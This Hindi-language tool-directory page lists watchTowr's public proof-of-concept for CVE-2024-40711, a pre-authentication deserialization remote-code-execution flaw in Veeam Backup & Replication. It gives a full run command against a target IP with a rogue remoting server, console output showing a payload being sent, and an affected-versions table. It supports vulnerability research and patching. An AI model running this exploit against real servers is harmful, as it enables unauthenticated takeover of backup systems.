Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40711 — CVE-2024-40711 के लिए पूर्व-प्रमाणीकरण एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/cve-2024-40711
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubwatchtowrlabs/cve-2024-40711

CVE-2024-40711

CVE-2024-40711 के लिए पूर्व-प्रमाणीकरण एक्सप्लॉइट

रिपॉजिटरी देखें
551822 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-40711

Veeam बैकअप और रेप्लिकेशन के प्री-ऑथ डीसीरियलाइज़ेशन CVE-2024-40711 के लिए एक्सप्लॉइट

हमारा ब्लॉग पोस्ट तकनीकी विवरण के लिए देखें

https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

कार्य में PoC

CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!

फ्लोरियन हाउज़र

यह कमजोरी फ्लोरियन हाउज़र (@frycos) द्वारा CODE WHITE GmbH (@codewhitesec) में पाई गई थी। उनके उत्कृष्ट शोध का पालन करना सुनिश्चित करें, हमारी भूमिका केवल इस समस्या के लिए एक्सप्लॉइट का पुनर्निर्माण और विकास करना था।

प्रभावित संस्करण

संस्करणस्थिति
12.2.0.334पूरी तरह से पैच किया गया। इस ब्लॉगपोस्ट में वर्णित कमजोरियों से प्रभावित नहीं।
12.1.2.172प्रभावित, लेकिन शोषण के लिए प्रमाणीकरण आवश्यक है। निम्न विशेषाधिकार वाले उपयोगकर्ता मनमाना कोड निष्पादित कर सकते हैं।
12.1.1.56 और पहलेअप्रमाणित RCE के लिए संवेदनशील।

एक्सप्लॉइट लेखक

यह एक्सप्लॉइट Sina Kheirkhah (@SinSinology) द्वारा watchTowr (@watchtowrcyber) में लिखा गया था।

हम इस एक्सप्लॉइट में उनकी मदद के लिए Soroush Dalili को धन्यवाद देना भी चाहेंगे।

watchTowr लैब्स को फॉलो करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम को फॉलो करें

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
  • https://github.com/codewhitesec/RogueRemotingServer
  • https://github.com/tyranid/ExploitRemotingService
  • https://www.veeam.com/kb4649
टूल डाउनलोड करें